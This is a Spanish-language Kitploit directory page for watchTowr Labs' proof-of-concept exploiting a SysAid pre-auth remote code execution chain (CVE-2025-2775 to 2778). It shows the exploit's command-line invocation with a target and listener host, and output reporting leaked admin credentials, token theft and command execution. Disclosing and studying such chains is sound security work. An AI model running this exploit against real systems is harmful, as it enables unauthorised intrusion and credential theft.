Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
watchTowr-vs-SysAid-PreAuth-RCE-Chain — PoC para la cadena de RCE PreAuth de SysAid (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778) | Kitploit
Herramientas/GitHubGitHub/watchtowrlabs/watchtowr-vs-sysaid-preauth-rce-chain
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubwatchtowrlabs/watchtowr-vs-sysaid-preauth-rce-chain

watchTowr-vs-SysAid-PreAuth-RCE-Chain

PoC para la cadena de RCE PreAuth de SysAid (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778)

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
126hace 1 añoAún no revisado

PoC de la cadena RCE PreAuth de SysAid

PoC para la cadena RCE PreAuth de SysAid (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778)

Consulta nuestra entrada de blog para detalles técnicos

https://github.com/user-attachments/assets/03245fab-915d-43b6-8e91-f0a18251af49

PoC en acción

root@kitploit:~

python watchTowr-vs-SysAid-PreAuth-RCE-Chain.py -t http://192.168.201.217:8080/ -l 192.168.201.1 -c "whoami"

                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-SysAid-PreAuth-RCE-Chain.py

        (*) SysAid Pre-Auth RCE Chain

          - Sina Kheirkhah (@SinSinology) and Jake Knott of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778]

[+] Starting HTTP server on port 80
[*] Leaking creds...
[+] Leaked credentials: admin:Aa123456
[+] Successfully logged in
[+] Extracted token
[*] Poisoning with commands
[+] Commands executed successfully
[*] Done


Versiones afectadas

Las siguientes versiones son vulnerables a esta cadena RCE pre-auth: <= 23.3.40, la nota de versión del proveedor se puede encontrar aquí

Sigue a watchTowr Labs

Para las últimas investigaciones de seguridad, sigue al equipo de watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Descargar herramienta